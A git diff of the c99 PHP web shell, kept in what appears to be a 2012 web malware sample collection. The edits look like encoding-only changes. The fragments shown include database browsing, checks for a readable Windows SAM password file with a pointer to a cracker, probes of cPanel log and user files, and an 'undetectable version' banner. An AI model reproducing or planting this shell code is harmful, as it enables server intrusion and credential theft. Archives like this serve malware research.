diff --git a/web-malware-collection-13-06-2012/PHP/c99.txt b/web-malware-collection-13-06-2012/PHP/c99.txt index 62f0faa..3244942 100644 --- a/web-malware-collection-13-06-2012/PHP/c99.txt +++ b/web-malware-collection-13-06-2012/PHP/c99.txt @@ -694,7 +694,7 @@ function mysql_query_form() if ($tbl_struct) { echo "Fields:
"; - foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
";} + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
";} echo ""; } } @@ -1003,7 +1003,7 @@ if ($act == "sql") { echo "---[ ".htmlspecialchars($sql_db)." ]---
"; $c = 0; - while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;} + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } @@ -1299,7 +1299,7 @@ if ($act == "sql") $i++; } echo ""; - echo "
»
"; + echo "
»
"; echo "
".$i." table(s)
"; echo "".$trows.""; echo "".$row[1].""; @@ -1528,7 +1528,7 @@ if ($act == "security") { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
";} - else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
";} } if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";} @@ -3012,7 +3012,7 @@ else } exit; } -if ($act == "about") {echo "
Undetectable version by
Spyn3t
";} +if ($act == "about") {echo "
Undetectable version by
Spyn3t
";} ?>

:: Command execute ::